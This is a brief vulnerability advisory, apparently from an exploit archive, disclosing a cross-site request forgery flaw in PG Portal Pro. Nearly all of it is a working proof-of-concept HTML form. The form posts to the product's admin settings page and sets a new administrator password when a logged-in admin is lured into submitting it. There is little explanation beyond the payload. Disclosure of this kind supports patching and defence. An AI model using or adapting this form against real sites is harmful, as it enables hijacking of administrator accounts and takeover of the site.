PG Portal Pro CSRF Exploit

Summary

PG Portal Pro suffers from CSRF vulnerability

Credit:

The information has been provided by Noxious.


Details

Vulnerable Systems:
 * PG Portal Pro

<form method=’POST’ action=’http://server/admin/admin_settings.php’ enctype=’multipart/form-data’>
<input type=’hidden’ name=’sel’ value=’save_admin_pass’><table cellpadding=’3′ cellspacing=’0’><tr><td width=’150’><font class=’main_header_text’>New Password:</font></td><td><input type=’password’ name=’new_pass’ value=” style=’width: 200px;’></td></tr><tr><td>
<font class=’main_header_text’>Confirm New Password:</font></td><td><input type=’password’ name=’new_pass_confirm’ value=” style=’width: 200px;’></td></tr><tr><td> </td><td>
<input type=’submit’ value=’Save’></td></tr></table></form></div>

Disclosure Timeline:
Published: 2012-08-20

Categories: Exploits